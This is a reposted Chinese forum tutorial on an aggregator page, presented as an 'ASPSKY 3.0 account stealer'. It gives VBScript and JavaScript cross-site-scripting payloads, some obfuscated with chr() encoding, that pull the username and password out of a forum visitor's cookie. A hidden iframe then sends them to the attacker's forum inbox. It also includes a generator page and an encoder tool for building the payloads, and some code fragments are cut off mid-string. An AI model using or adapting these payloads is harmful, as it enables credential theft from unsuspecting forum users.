完美的解決跨站指令碼的COOKIE彈框框的問題

來源:互聯網
上載者:User
cookie|指令碼|解決|問題

先頭看到慾望之翼的self.window的辦法
其實我一直有個從來沒給任何人說的辦法:
玩了好久了公布了呵呵:
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "沒有加入地址或使用者名稱?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="rtAdjacentHTML(""beforeEnd"",""<div style=display:none&
gt;<iframe id=sendmessage></iframe></div>""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title=""+mid(document.cookie,instr(lcase(document.cookie),
""password"")+9,10)+""&message=""+""I am a goo
d boy"",""_self"")  ")" />"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷號器---C.Z.Y原創</FONT>
<form name=form1>
設定發送地址:<input type=text name=loc size=50><br>
▲注意發送地址形如:http://www.nnit30.com/newbbs(newbbs是網站中論壇的安裝目錄
最後
不用加/)<br>
發送的使用者名稱:<input type=text name=who size=20>-------------
<input type=button name=change value=產生代碼 onclick=changeq()><br>
產生的程式碼:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>

搞了大半天的結果,偷aspsky 3.0 密碼的東東把下面的代碼改一改
然後發到你的貼子裡,只要有人看你的貼子他的密碼就自動發到你的在
論壇上的郵箱裡了,爽吧,其實我的是用VBScript寫的snwcwt用javascript
寫的沒有雙引號的問題而且可以同時寫幾行代碼所以要實用一些!!
不過效果都差不多哈:)(注意要先把下面的東東改一下發送的地址然
後全部寫在一行裡)
r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr
(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119
)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c
hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr
(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1
10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6
1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101
)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)
&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch
r(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(112)+chr(97)+c
hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(document.cookie)-ins
tr(lcase(document.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c
hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch
r(101)&chr(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(117)+
chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do
cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(
115))-1)-instr(lcase(document.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11
0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(
61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&
chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1
03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116
)&chr(104)&chr(61)&chr(49))" alt="完美的解決跨站指令碼的COOKIE彈框框的問題-跨站cookie">

簡化形式:window.open(開啟的串連,表單名,表單大小設定)
開啟的串連:
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....
對應編碼為


chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9
7)&chr(103)&chr(101)&chr(61)

不同的網站要自已改注意在哪兒結束同時還有發到的使用者名稱都在這兒改
對於編碼看如下代碼:


<html>
<script language=vbs>
sub main()
base=form1.text1.value
for i=1 to len(base)
aa=asc(mid(base,i,1))
document.write "chr(" & aa & ")" & "&"
next
end sub
</script>
<body ><form name=form1><table>
<tr><td>
<input type=text name=text1 size=40><br>
<input type=button name=button1 onclick=main() value=change>
</td></tr>
</table></form></body></html>

第二部份:為提取的COOKIE中的使用者名稱和密碼

------------------------再來一個js的放便學習----------------------------------

'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj
acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me
ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum
ent.location=\'cwt&title=\'+username+\'的密碼&message=username=\'+username+\'    password=\'+pa
ssword+\'\';')" />



相關文章

Beyond APAC's No.1 Cloud

19.6% IaaS Market Share in Asia Pacific - Gartner IT Service report, 2018

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。